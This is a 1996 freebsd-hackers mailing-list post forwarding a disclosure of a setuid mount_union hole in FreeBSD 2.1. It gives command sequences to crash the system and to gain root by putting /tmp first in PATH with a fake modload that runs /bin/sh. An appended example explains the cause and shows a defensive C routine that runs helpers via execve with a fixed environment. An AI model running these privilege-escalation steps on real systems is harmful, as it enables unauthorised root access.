Date:      Fri, 17 May 1996 19:06:03 -0400 (EDT)
From:      Dan Polivy <danp@library.pride.net>
To:        freebsd-hackers@freebsd.org
Subject:   SECURITY BUG in FreeBSD (fwd)
Message-ID:  <Pine.BSF.3.91.960517190355.230C-100000@library.pride.net>

I came across this in my travels...thought you guys may be interested
(in case you didn't already know)...It's worked for me on my -RELEASE,
and -STABLE machines...dunno about any others...

Dan

+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|         JRI HIS MIS Systems Administrator/Tech Support         |
|////////////////////////////////////////////////////////////////|
|    danp@busstop.org dpolivy@jri.org danp@library.pride.net     |
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|
|        Check out JRI's Homepage at http://www.jri.org          |
|////////////////////////////////////////////////////////////////|
| EMail health@jri.org or check out http://www.jri.org/jrihealth |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

---------------------------------
Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to get euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and you are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL
----------------------------------
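
Added example, not part of the original message and not FreeBSD's code: the second set of commands only works if the setuid program starts `modload` through a search of the caller's PATH, which is an inference from the steps rather than something the message states. The sketch below shows how a privileged program can run a helper without trusting the caller's environment; `run_helper`, `SAFE_ENV` and the PATH value in it are hypothetical names and values chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the helper; nothing is inherited from the caller. */
static char *const SAFE_ENV[] = {
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin", "IFS= \t\n", NULL
};

/*
 * Run a helper from a privileged program.
 * Returns the helper's exit status, or -1 if the request was refused
 * or the helper could not be started or did not exit normally.
 */
int run_helper(const char *abs_path, char *const argv[])
{
    int status;
    pid_t pid;

    /* Refuse any name that would need a PATH search to resolve. */
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve, not execvp or system(): no PATH lookup, no shell parsing. */
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);
    }
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed demo: caller-controlled PATH as in the message, then run a helper. */
    char *const argv[] = { "sh", "-c",
        "test \"$PATH\" = /sbin:/bin:/usr/sbin:/usr/bin", NULL };
    setenv("PATH", "/tmp:/bin", 1);
    return run_helper("/bin/sh", argv);   /* 0: the helper saw only SAFE_ENV */
}
```

A setuid program that does not need root for the helper itself should also drop its effective uid before the `execve` call.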
